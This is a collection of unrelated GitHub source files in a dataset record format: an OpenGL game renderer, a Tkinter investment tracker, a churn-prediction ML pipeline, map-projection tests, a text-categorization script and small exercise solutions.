draw_texture_nineslice(self, texture_name, pos: tuple[int, int], size: tuple[int, int], uv: tuple[int, int], uv_size: tuple[int, int], nineslice: tuple[int, int, int, int], tw: int, th: int):\n self.texture_manager.get(texture_name).bind()\n glColor4f(1.0, 1.0, 1.0, 1.0)\n glBegin(GL_QUADS) \n # Top Left\n self.__draw_texture_quad(pos[0], pos[1], nineslice[0], nineslice[1], uv[0], uv[1], nineslice[0], nineslice[1], tw, th)\n # Top Middle\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1], size[0] - nineslice[0] - nineslice[2], nineslice[1], uv[0] + nineslice[0], uv[1], 
uv_size[0] - nineslice[0] - nineslice[2], nineslice[1], tw, th)\n # Top Right\n self.__draw_texture_quad(pos[0] + size[0] - nineslice[2], pos[1], nineslice[2], nineslice[1], uv[0] + uv_size[0] - nineslice[2], uv[1], nineslice[2], nineslice[1], tw, th)\n # Left Middle\n self.__draw_texture_quad(pos[0], pos[1] + nineslice[1], nineslice[0], size[1] - nineslice[1] - nineslice[3], uv[0], uv[1] + nineslice[1], nineslice[0], uv_size[1] - nineslice[2] - nineslice[3], tw, th)\n # Center\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1] + nineslice[1], size[0] - nineslice[0] - nineslice[2], size[1] - nineslice[1] - nineslice[3], uv[0] + nineslice[0], uv[1] + nineslice[1], uv_size[0] - nineslice[0] - nineslice[2], uv_size[1] - nineslice[1] - nineslice[3], tw, th)\n # Right Middle\n self.__draw_texture_quad( pos[0] + size[0] - nineslice[2], pos[1] + nineslice[1], nineslice[2], size[1] - nineslice[1] - nineslice[3], uv[0] + uv_size[0] - nineslice[2], uv[1] + nineslice[1], nineslice[2], uv_size[1] - nineslice[1] - nineslice[3], tw, th)\n # Bottom Left\n self.__draw_texture_quad(pos[0], pos[1] + size[1] - nineslice[3], nineslice[0], nineslice[3], uv[0], uv[1] + uv_size[1] - nineslice[3], nineslice[0], nineslice[3], tw, th)\n # Bottom Middle\n self.__draw_texture_quad(pos[0] + nineslice[0], pos[1] + size[1] - nineslice[3], size[0] - nineslice[0] - nineslice[2], nineslice[3], uv[0] + nineslice[0], uv[1] + uv_size[1] - nineslice[2], uv_size[0] - nineslice[0] - nineslice[2], nineslice[3], tw, th)\n # Bottom Right\n self.__draw_texture_quad(pos[0] + size[0] - nineslice[2], pos[1] + size[1] - nineslice[3], nineslice[2], nineslice[3], uv[0] + uv_size[0] - nineslice[2], uv[1] + uv_size[1] - nineslice[3], nineslice[2], nineslice[3], tw, th)\n glEnd()\n\n def __draw_texture_quad(self, x: int, y: int, width: int, height: int, u: int, v: int, us: int, vs: int, tw: int, th: int):\n u0 = u / tw\n v0 = v / th\n u1 = (u + us) / tw\n v1 = (v + vs) / th\n \n glTexCoord2f(u0, v0)\n glVertex3f(x, y, 0)\n glTexCoord2f(u0, v1)\n glVertex3f(x, y + height, 0)\n glTexCoord2f(u1, v1)\n glVertex3f(x + width, y + height, 0)\n glTexCoord2f(u1, v0)\n glVertex3f(x + width, y, 0)\n\n def draw_rect(self, pos: tuple[int, int], size: tuple[int, int], color: int = 0xFFFFFFFF):\n glEnable(GL_BLEND)\n glDisable(GL_TEXTURE_2D)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glColor4f((color >> 16 & 0xFF) / 255.0, (color >> 8 & 0xFF) / 255.0, (color & 0xFF) / 255.0, (color >> 24 & 0xFF) / 255.0)\n glBegin(GL_QUADS)\n glVertex3f(pos[0], pos[1], 0)\n glVertex3f(pos[0], pos[1] + size[1], 0)\n glVertex3f(pos[0] + size[0], pos[1] + size[1], 0)\n glVertex3f(pos[0] + size[0], pos[1], 0)\n glEnd()\n glColor4f(1.0, 1.0, 1.0, 1.0)\n glDisable(GL_BLEND)\n glEnable(GL_TEXTURE_2D)\n\n def draw_texture(self, texture_name, x: int, y: int, width: int, height: int, u: int, v: int, us: int, vs: int, tw: int, th: int, color: int = 0xFFFFFF):\n self.texture_manager.get(texture_name).bind()\n\n glColor4f((color >> 16 & 0xFF) / 255.0, (color >> 8 & 0xFF) / 255.0, (color & 0xFF) / 255.0, 1.0)\n glBegin(GL_QUADS)\n self.__draw_texture_quad(x, y, width, height, u, v, us, vs, tw, th)\n glEnd()\n\n def tick(self):\n if self.world != None:\n self.world.tick()\n self.player.tick()\n\nif __name__ == \"__main__\":\n pygame.init()\n game = Game()\n game.run()\n 
pygame.quit()","repo_name":"KalmeMarq/python-cc-projects","sub_path":"voxels/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73362156212","text":"from Tkinter import *\nimport os\nimport runpy\n\nmf=Tk()\n\n#defining functions\ndef open_home():\n mf.destroy()\n runpy.run_path(\"home.py\")\n\ndef open_stocks():\n mf.destroy()\n runpy.run_path(\"mf.py\")\n \ndef open_re():\n mf.destroy()\n runpy.run_path(\"re.py\")\n \ndef open_gold():\n mf.destroy()\n runpy.run_path(\"gold.py\")\n \ndef open_cash():\n mf.destroy()\n runpy.run_path(\"cash.py\")\n \ndef open_bonds():\n mf.destroy()\n runpy.run_path(\"bonds.py\")\n\ndef mf_form():\t\t\t#entry form\n\tinputform = Tk()\n\t\n\t\n\tinputform.title=(\"Add New Mutual Fund\")\n\t\n\tLabel(inputform , text=\"Add new Mutual Fund\" , font = \"Lato 20\").grid(row=0)\n\t\n\tstock_symbol = Label(inputform , text= \"Fund Name\" , font = \"Lato 15\" , fg = 'White', bg='Black', width=20)\n\tstock_symbol.grid(row=1,column=0)\n\tget_fund = Entry(inputform,width=20).grid(row=1 , column=1)\n\t\n\tnumber_of_units = Label(inputform , text= \"Number of units\" , font = \"Lato 15\" , fg = 'White', bg='Black', width=20)\n\tnumber_of_units.grid(row=2,column=0)\n\tget_unit = Entry(inputform).grid(row=2 , column=1)\n\t\n\tprice= Label(inputform, text=\"Purchase Price\" ,font = \"Lato 15\" , fg = 'White', bg='Black',width=20)\n\tprice.grid(row=3,column=0)\n\tget_price = Entry(inputform).grid(row=3 , column=1)\n\t\n\tdate_purchase= Label(inputform , text =\"Date of Purchase\" ,font = \"Lato 15\" , fg = 'White', bg='Black',width=20)\n\tdate_purchase.grid(row=4,column=0)\n\tget_date = Entry(inputform).grid(row= 4, column=1)\n\t\n\taccept = Button(inputform, text=\"Accept\", font = \"Lato 15\" , fg = 'Black' , width=40,command=lambda:inputform.destroy())\n\taccept.grid(row=5)\n\t \n\tinputform.mainloop()\n\n#defining the rest of mf.py\t\n\nmf.title(\"LIT\")\nmf.geometry(\"1920x1080\")\n\nl1=Label(mf,text=\" \", font=\"Lato 20\").pack()\nl2=Label(mf, text=\"L O N G - T E R M I N V E S T M E N T T R A C K E R\", font=\"Lato 30\").pack()\n\ntop = Frame(mf)\ntop.pack(side=TOP)\n\nl3=Label(mf,text=\"Mutual Funds\", font=\"Lato 20\").pack()\n\nmainoptions = ['Home', 'Stocks', 'Mutual Funds','Real estate','Gold', 'Cash', 'Bonds']\ni=0\n\nl1 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command= open_home)\nl1.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl2 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black',command= open_stocks)\nl2.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl3 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black')\nl3.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl4 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_re)\nl4.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl5 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_gold)\nl5.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl6 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_cash)\nl6.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nl7 = Button(mf,text=mainoptions[i], font=\"Lato 20\",fg='White',bg='Black', command=open_bonds)\nl7.place(x = 0, y = 200 + i*51, width=200, height=50)\ni+=1\n\nadd_entry = Button(mf, text=\"Add an 
entry\", font= \"Lato 20\" , fg = 'White' , bg ='Black' ,command= mf_form ) #give command\nadd_entry.place (x= 1600 , y=900 , width=200 , height =50)\nmainloop()\n\n","repo_name":"anshul-pinto/anshul","sub_path":"mf.py","file_name":"mf.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9504074280","text":"# library doc string\n\"\"\"\nModule that defines all necessary functions as part of a class, that can be used to analyze the\ndata provided in /data, perform some EDA on the data and save the resulting images to /images\nand trains a machine learning model, that is saved in /models.\n\n\nAuthor: David Hedderich\nDate: 26.02.2023\n\"\"\"\n# import libraries\n\nfrom sklearn.metrics import plot_roc_curve, classification_report\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport shap\nimport joblib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom constants import random_forest_search_space, logreg_solver, logreg_max_iter\nsns.set()\n\n\nclass ChurnPredictor():\n \"\"\"\n The following class imports data from ./data, performs an EDA, saves the EDA results to a \n folder, encodes specific columns, performs feature engineering, trains a machine learning\n model, saves a training report to ./images/results and saves the machine learning models\n to ./models\n Arguments:\n - path: (str) a path to the csv\n - target_column: (str) column that holds the binary classification resulting in either\n \"Churn\" (1) or \"No Churn (0) target_column_churn_name: (str) name of the positive\n class within the binary classification target column that represents the \"Churn\" (1),\n if the target column is categorical\n - target_column_churn_name: (str) Name of the positive class in the target_column.\n\n Methods:\n import_data: returns dataframe for the csv found at pth\n \n \"\"\"\n\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path, target_column, target_column_churn_name):\n \"\"\"\n initializes the class ChurnPredictor and assigns the input parameters\n\n input:\n path: (str) a path to the csv\n target_column: (str) column that holds the binary classification resulting in\n either \"Churn\" (1) or \"No Churn (0) target_column_churn_name: (str) name of\n the positive class within the binary classification target column that \n represents the \"Churn\" (1), if the target column is categorical\n \"\"\"\n self.path = path\n self.target_column = target_column\n self.target_column_churn_name = target_column_churn_name\n\n self.dataframe = self.import_data()\n\n self.cat_columns, self.num_columns = self.perform_eda()\n self.encoder_helper()\n self.x_train, self.x_test, self.y_train, self.y_test = self.perform_feature_engineering()\n self.y_train_preds_rf, self.y_test_preds_rf, \\\n self.y_train_preds_lr, self.y_test_preds_lr = self.train_models()\n self.classification_report_image()\n self.feature_importance_plot()\n\n\n def import_data(self):\n \"\"\" returns dataframe for the csv found at path\n\n input:\n self.path: (str) a path to the csv\n output:\n self.dataframe: (DataFrame) pandas dataframe\n \"\"\"\n\n # Read in .csv file\n dataframe = pd.read_csv(self.path, index_col=0)\n\n # Encode target column to create a binary classification problem\n dataframe[self.target_column] = 
dataframe[self.target_column].apply(\n            lambda val: 1 if val == self.target_column_churn_name else 0)\n\n        return dataframe\n\n    def perform_eda(self):\n        '''\n        perform eda on df and save figures to images folder\n        input:\n                self.dataframe: (DataFrame) pandas dataframe\n\n        output:\n                cat_columns: (Index) names of the categorical columns\n                num_columns: (Index) names of the numerical columns\n        '''\n\n        # Print out some overview metrics regarding the dataset\n        print(\"SUMMARY of the imported data: \\n\")\n        print(\"Shape: \\n\")\n        print(self.dataframe.shape)\n        print(\"Number of NaN values: \\n\")\n        print(self.dataframe.isnull().sum())\n        print(\"Statistics of numerical columns: \\n\")\n        print(self.dataframe.describe())\n\n        # Identify column types\n        cat_columns = self.dataframe.select_dtypes(include='object').columns\n        num_columns = self.dataframe.select_dtypes(\n            include=['int', 'float']).columns\n\n        # Plot and save univariate analysis and bivariate analysis\n        for column in num_columns:\n            fig = plt.figure(figsize=(20, 10))\n            self.dataframe[column].hist()\n            fig.savefig(f'images/eda/{column}_num_univariate.png')\n            plt.close(fig)\n\n        for column in cat_columns:\n            fig = plt.figure(figsize=(20, 10))\n            self.dataframe[column].value_counts(normalize=True).plot(kind='bar')\n            fig.savefig(f'images/eda/{column}_cat_univariate.png')\n            plt.close(fig)\n\n        fig = plt.figure(figsize=(20, 10))\n        sns.heatmap(\n            self.dataframe.corr(),\n            annot=False,\n            cmap='Dark2_r',\n            linewidths=2)\n        fig.savefig('images/eda/bivariate.png')\n        plt.close(fig)\n\n        return cat_columns, num_columns\n\n    def encoder_helper(self):\n        '''\n        helper function to turn each categorical column into a new column with\n        proportion of churn for each category - associated with cell 15 from the notebook\n\n        input:\n                self.dataframe: (DataFrame) pandas dataframe\n                self.cat_columns: (list) list of columns that contain categorical features\n\n        output:\n                None\n        '''\n\n        for column in self.cat_columns:\n            helper_lst = []\n            cat_column_groups = self.dataframe.groupby(column).mean()[\n                self.target_column]\n\n            for val in self.dataframe[column]:\n                helper_lst.append(cat_column_groups.loc[val])\n\n            self.dataframe[column] = helper_lst\n\n    def perform_feature_engineering(self):\n        '''\n        input:\n              self.dataframe: (DataFrame) pandas dataframe\n\n        output:\n              x_train: x training data\n              x_test: x testing data\n              y_train: y training data\n              y_test: y testing data\n        '''\n\n        df_train_columns = self.dataframe.drop([self.target_column], axis=1)\n        x_train, x_test, y_train, y_test = train_test_split(\n            df_train_columns, self.dataframe[self.target_column], test_size=0.3, random_state=42)\n        return x_train, x_test, y_train, y_test\n\n    def train_models(self):\n        '''\n        train, store model results: images + scores, and store models\n        input:\n              self.x_train: x training data\n              self.x_test: x testing data\n              self.y_train: y training data\n              self.y_test: y testing data\n        output:\n              y_train_preds_lr: training predictions from logistic regression\n              y_train_preds_rf: training predictions from random forest\n              y_test_preds_lr: test predictions from logistic regression\n              y_test_preds_rf: test predictions from random forest\n        '''\n        # grid search\n        rfc = RandomForestClassifier(random_state=42)\n        lrc = LogisticRegression(solver=logreg_solver, max_iter=logreg_max_iter)\n\n        # Define search space for Random Forest\n        param_grid = random_forest_search_space\n\n        cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n        cv_rfc.fit(self.x_train, self.y_train)\n        lrc.fit(self.x_train, self.y_train)\n\n        y_train_preds_rf = cv_rfc.best_estimator_.predict(self.x_train)\n        y_test_preds_rf = 
cv_rfc.best_estimator_.predict(self.x_test)\n\n y_train_preds_lr = lrc.predict(self.x_train)\n y_test_preds_lr = lrc.predict(self.x_test)\n\n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n\n return y_train_preds_rf, y_test_preds_rf, y_train_preds_lr, y_test_preds_lr\n\n def classification_report_image(self):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n self.y_train: training response values\n self.y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n # Print scores to terminal\n print('random forest results')\n print('test results')\n print(classification_report(self.y_test, self.y_test_preds_rf))\n print('train results')\n print(classification_report(self.y_train, self.y_train_preds_rf))\n\n print('logistic regression results')\n print('test results')\n print(classification_report(self.y_test, self.y_test_preds_lr))\n print('train results')\n print(classification_report(self.y_train, self.y_train_preds_lr))\n\n # Load models\n rfc_model = joblib.load('./models/rfc_model.pkl')\n lr_model = joblib.load('./models/logistic_model.pkl')\n\n # Create and save ROC curves\n lrc_plot = plot_roc_curve(lr_model, self.x_test, self.y_test)\n lrc_plot.figure_.savefig('images/results/logistic_model_roc.png')\n\n rfc_plot = plot_roc_curve(rfc_model, self.x_test, self.y_test)\n rfc_plot.figure_.savefig('images/results/rforest_model_roc.png')\n\n combined_figure = plt.figure(figsize=(15, 8))\n axis = plt.gca()\n rfc_plot.plot(ax=axis, alpha=0.8)\n lrc_plot.plot(ax=axis, alpha=0.8)\n combined_figure.savefig('images/results/combined_roc.png')\n plt.close(combined_figure)\n\n def feature_importance_plot(self):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n self.x_test: x testing data\n\n output:\n None\n '''\n # Load random forest model\n rfc_model = joblib.load('./models/rfc_model.pkl')\n\n explainer = shap.TreeExplainer(rfc_model)\n shap_values = explainer.shap_values(self.x_test)\n shap.summary_plot(\n shap_values,\n self.x_test,\n plot_type=\"bar\",\n show=False)\n plt.savefig('images/results/feature_importance_SHAP')\n\n\nif __name__ == '__main__':\n predictor = ChurnPredictor(\n 'data/bank_data.csv',\n 'Attrition_Flag',\n 'Attrited Customer')\n","repo_name":"dhedderich/churn-predictor-clean-code","sub_path":"churn_library.py","file_name":"churn_library.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32453338526","text":"list = [\"apex legends\", \"counter strike global offensive\", \"madden\", \"nba 2k\"]\nprint(\"I like these games\")\nfor x in list: \n print(x)\nz = input(\"how many games do you want to add\")\ndef add(amount_of_games):\n for a in range(0, int(amount_of_games)):\n y = input(\"what game do you want to add (one at a time)\")\n list.append(y)\n for x in list:\n print(x)\nadd(z)\n 
","repo_name":"Pranav12345678910/ATCS-2021","sub_path":"project0/manyGames.py","file_name":"manyGames.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4438255517","text":"import unittest\n\nfrom source.complex_log_projection import ComplexLogProjection\nfrom source.lat_lng import LatLng\nfrom source.raster_data.function_raster_data_provider import CosSinRasterDataProvider\nfrom source.raster_data.osm_raster_data_provider import OSMRasterDataProvider\nfrom source.raster_projector import RasterProjector, TargetSectionDescription\nfrom source.smoothing_functions import DualCosSmoothingFunction, CosCutoffSmoothingFunction\nfrom source.zoomable_projection import IdentityProjection\nfrom source.hard_coded_providers import get_providers\n\nfrom logging import basicConfig, INFO\n\nfrom test.raster_data.dummy_resolver import dummy_resolver\n\nbasicConfig(level=INFO)\nimport math\n\n\nclass TestRasterProjector(unittest.TestCase):\n def test_grid(self):\n projector = RasterProjector(IdentityProjection(), CosSinRasterDataProvider())\n trange = TargetSectionDescription(-1, 1, 3, -1, 1, 3)\n grid = projector.build_grid(trange)\n assert len(grid.shape) == 2 and grid.shape[1] == 3 * 3\n\n def test_project(self):\n projector = RasterProjector(IdentityProjection(), CosSinRasterDataProvider())\n trange = TargetSectionDescription(0, 2 * math.pi, 200, -1, 1, 100)\n d = projector.project(trange)\n\n assert d.shape[0] == trange.ysteps and d.shape[1] == trange.xsteps\n\n def project_image(self):\n projection = ComplexLogProjection(LatLng(0, 0), LatLng(10, 10), math.pi / 4)\n projector = RasterProjector(projection, CosSinRasterDataProvider())\n trange = TargetSectionDescription(-1, 1, 500, -1, 1, 300)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm(self):\n konstanz = LatLng(47.711801, 9.084545)\n hoffeld = LatLng(48.735051, 9.181156)\n projection = ComplexLogProjection(konstanz, hoffeld, math.pi / 6,\n smoothing_function_type=DualCosSmoothingFunction)\n projector = RasterProjector(projection, OSMRasterDataProvider(dummy_resolver))\n trange = TargetSectionDescription(-math.pi * 2, math.pi * 2, 500, -math.pi, math.pi, 250)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm_small(self):\n konstanz = LatLng(47.711801, 9.084545)\n sealive = LatLng(47.656846, 9.179489) # sealive\n projection = ComplexLogProjection(konstanz, sealive, math.pi / 6,\n smoothing_function_type=CosCutoffSmoothingFunction)\n projector = RasterProjector(projection, OSMRasterDataProvider(dummy_resolver))\n trange = TargetSectionDescription(-math.pi * 2, math.pi * 2, 500, -math.pi, math.pi, 250)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.show()\n\n def test_project_image_osm_wide(self):\n prov = get_providers()\n konstanz = LatLng(47.711801, 9.084545)\n leipzig = LatLng(51.348419,12.370946) #\n projection = ComplexLogProjection(konstanz, leipzig, math.pi / 6,\n smoothing_function_type=CosCutoffSmoothingFunction)\n projector = RasterProjector(projection, prov['transparent'])\n trange = TargetSectionDescription(-math.pi * 4, math.pi * 4, 2000, -math.pi, math.pi, 500)\n d = projector.project(trange)\n\n import matplotlib.pyplot as plt\n plt.imshow(d)\n plt.savefig(\"sample.png\",dpi=2000)\n plt.clf()\n\n def test_vis_zoomLevel(self):\n\n\n 
projection1 = ComplexLogProjection(LatLng(0, 0), LatLng(10, 10), math.pi / 4)\n        projection2 = ComplexLogProjection(LatLng(-10, -10), LatLng(10, 10), math.pi / 4)\n        projector = RasterProjector(projection1, OSMRasterDataProvider(dummy_resolver))\n        grid = projector.build_grid(TargetSectionDescription(-4, 4, 400, -2, 2, 200))\n        zoom = projection1.getZoomLevel(grid, 100)\n        import matplotlib.pyplot as plt\n        plt.imshow(zoom.reshape(200, 400))\n        plt.colorbar()\n        plt.show()\n        plt.scatter(range(400), zoom.reshape(200, 400)[10, :])\n        plt.show()\n","repo_name":"saildeep/master_backend","sub_path":"test/test_raster_projector.py","file_name":"test_raster_projector.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"30475026627","text":"\ns=input()\nt=input()\nk=int(input())\nb=min(len(s),len(t))\np=0\nfor i in range(b):\n    if s[i] != t[i]:\n        break\n    p+=1\nd = len(s)-p\na = len(t)-p\ny = k-(d+a)\nif k >= len(t)+len(s):\n    print('Yes')\n\nelif y%2==0 and y>=0:\n    print('Yes')\nelse:\n    print('No')\n","repo_name":"Ananya9878/Hackerrank","sub_path":"IMPLEMENTATION/append_and_delete.py","file_name":"append_and_delete.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"10288182555","text":"from nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import PorterStemmer\r\nfrom yake import KeywordExtractor\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\nimport itertools\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import LabelBinarizer, LabelEncoder\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom tensorflow import keras\r\nfrom io import StringIO\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.model_selection import cross_val_score\r\nlayers = keras.layers\r\nmodels = keras.models\r\n\r\ndef train_test_split(data, train_size):\r\n    train = data[:train_size]\r\n    test = data[train_size:]\r\n    return train, test\r\n\r\ndef plot_confusion_matrix(cm, classes,title='Confusion matrix',cmap=plt.cm.Blues):\r\n    cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n    plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n    plt.title(title, fontsize=30)\r\n    plt.colorbar()\r\n    tick_marks = np.arange(len(classes))\r\n    plt.xticks(tick_marks, classes, rotation=45, fontsize=22)\r\n    plt.yticks(tick_marks, classes, fontsize=22)\r\n\r\n    fmt = '.2f'\r\n    thresh = cm.max() / 2.\r\n    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n        plt.text(j, i, format(cm[i, j], fmt),horizontalalignment=\"center\",color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n    plt.ylabel('True label', fontsize=25)\r\n    plt.xlabel('Predicted label', fontsize=25)\r\n\r\n\r\n'''\r\nSolution 1: Using YAKE (https://github.com/LIAAD/yake)\r\n----------\r\n\r\nThis is a handy keyword extraction library so more for tagging but also useful if you rank the tags and then apply the LOWER score that has a match in your category data set. \r\nNote that the LOWER the score, the MORE relevant the keyword extracted. Subtract the floating point from an integer if you want to see it HIGHER but an unnecessary operation IMHO\r\n'''\r\ndef solution1():\r\n    inputText=None\r\n    with open(\"TESTDATA.TXT\",'r') as f:\r\n        inputText=f.read()\r\n    # filteredText was undefined here; build it by stripping English stop words\r\n    # (the assumed intent behind the otherwise unused nltk imports above)\r\n    stop_words = set(stopwords.words('english'))\r\n    filteredText = ' '.join(w for w in word_tokenize(inputText) if w.lower() not in stop_words)\r\n    extractor=KeywordExtractor()\r\n    print(filteredText)\r\n    print(extractor.extract_keywords(filteredText))\r\n
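\r\n# Usage sketch (hypothetical text, illustrative scores): extract_keywords returns\r\n# (keyword, score) pairs, and a LOWER score means a MORE relevant keyword, e.g.\r\n#   KeywordExtractor().extract_keywords('machine learning improves keyword extraction')\r\n#   # -> [('keyword extraction', 0.04), ('machine learning', 0.09), ...]\r\n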
\r\n'''\r\nEnd of Solution 1\r\n'''\r\n\r\n'''\r\nSolution 2: Just rename the data set from TESTDATA.CSV\r\n----------\r\n'''\r\ndef solution2():\r\n    data = pd.read_csv(\"TESTDATA.CSV\")\r\n    train_size = int(len(data) * .8)\r\n    print (\"Train size: %d\" % train_size)\r\n    print (\"Test size: %d\" % (len(data) - train_size))\r\n    train_cat, test_cat = train_test_split(data['category'], train_size)\r\n    train_text, test_text = train_test_split(data['text'], train_size)\r\n    max_words = 1000\r\n    tokenize = keras.preprocessing.text.Tokenizer(num_words=max_words,char_level=False)\r\n    #Fit tokenizer to our training text data\r\n    tokenize.fit_on_texts(train_text)\r\n    x_train = tokenize.texts_to_matrix(train_text)\r\n    x_test = tokenize.texts_to_matrix(test_text)\r\n    #Utility to convert label strings to numbered index\r\n    encoder = LabelEncoder()\r\n    encoder.fit(train_cat)\r\n    y_train = encoder.transform(train_cat)\r\n    y_test = encoder.transform(test_cat)\r\n    #Converts the labels to a one-hot representation\r\n    num_classes = np.max(y_train) + 1\r\n    y_train = keras.utils.to_categorical(y_train, num_classes)\r\n    y_test = keras.utils.to_categorical(y_test, num_classes)\r\n    '''\r\n    This model trains very quickly and 2 epochs are already more than enough\r\n    Training for more epochs will likely lead to overfitting on this dataset\r\n    You can try tweaking these hyperparameters when using this model with your own data\r\n    '''\r\n    batch_size = 32\r\n    epochs = 2\r\n    drop_ratio = 0.5\r\n    model = models.Sequential()\r\n    model.add(layers.Dense(512, input_shape=(max_words,)))\r\n    model.add(layers.Activation('relu'))\r\n    model.add(layers.Dense(num_classes))\r\n    model.add(layers.Activation('softmax'))\r\n    model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\r\n    history = model.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_split=0.1)\r\n\r\n    #Following is to simply visualize the output\r\n    y_softmax = model.predict(x_test)\r\n    text_labels = encoder.classes_\r\n    y_test_1d = []\r\n    y_pred_1d = []\r\n\r\n    for i in range(len(y_test)):\r\n        probs = y_test[i]\r\n        index_arr = np.nonzero(probs)\r\n        one_hot_index = index_arr[0].item(0)\r\n        y_test_1d.append(one_hot_index)\r\n\r\n    for i in range(0, len(y_softmax)):\r\n        probs = y_softmax[i]\r\n        predicted_index = np.argmax(probs)\r\n        y_pred_1d.append(predicted_index)\r\n\r\n    cnf_matrix = confusion_matrix(y_test_1d, y_pred_1d)\r\n    plt.figure(figsize=(18,14))\r\n    plot_confusion_matrix(cnf_matrix, classes=text_labels, title=\"Confusion matrix\")\r\n    plt.show()\r\n\r\n'''\r\nEnd of Solution 2\r\n'''\r\n\r\n'''\r\nSolution 3: LinearSVCs can at times be more accurate than NaiveBayes, don't forget to rename from TESTDATA.CSV to the uri of your file\r\n\r\nWARNING - You may run into some memory errors if you do not have enough RAM (cause of high volume input)\r\n----------\r\n'''\r\ndef solution3():\r\n    df = pd.read_csv('TESTDATA.CSV')\r\n    df = df[pd.notnull(df['Consumer complaint narrative'])]\r\n    col = ['Product', 'Consumer complaint narrative']\r\n    df = df[col]\r\n    df['category_id'] = df['Product'].factorize()[0]\r\n    category_id_df = df[['Product', 
'category_id']].drop_duplicates().sort_values('category_id')\r\n category_to_id = dict(category_id_df.values)\r\n id_to_category = dict(category_id_df[['category_id', 'Product']].values)\r\n tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2), stop_words='english')\r\n\r\n features = tfidf.fit_transform(df['Consumer complaint narrative']).toarray()\r\n labels = df.category_id\r\n\r\n models = [\r\n RandomForestClassifier(n_estimators=200, max_depth=3, random_state=0),\r\n LinearSVC(),\r\n MultinomialNB(),\r\n LogisticRegression(random_state=0),\r\n ]\r\n cv_df = pd.DataFrame(index=range(5 * len(models)))\r\n entries = []\r\n for model in models:\r\n model_name = model.__class__.__name__\r\n accuracies = cross_val_score(model, features, labels, scoring='accuracy', cv=5)\r\n for fold_idx, accuracy in enumerate(accuracies):\r\n entries.append((model_name, fold_idx, accuracy))\r\n cv_df = pd.DataFrame(entries, columns=['model_name', 'fold_idx', 'accuracy'])\r\n print(cv_df.groupby('model_name').accuracy.mean())\r\n\r\n'''\r\nEnd of Solution 3\r\n'''\r\n#solution1()\r\n#solution2()\r\n#solution3()\r\n","repo_name":"krypted/lightweightcategorizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"16579126666","text":"from cs50 import get_int\nimport math\n\n\ndef main():\n # prompt for 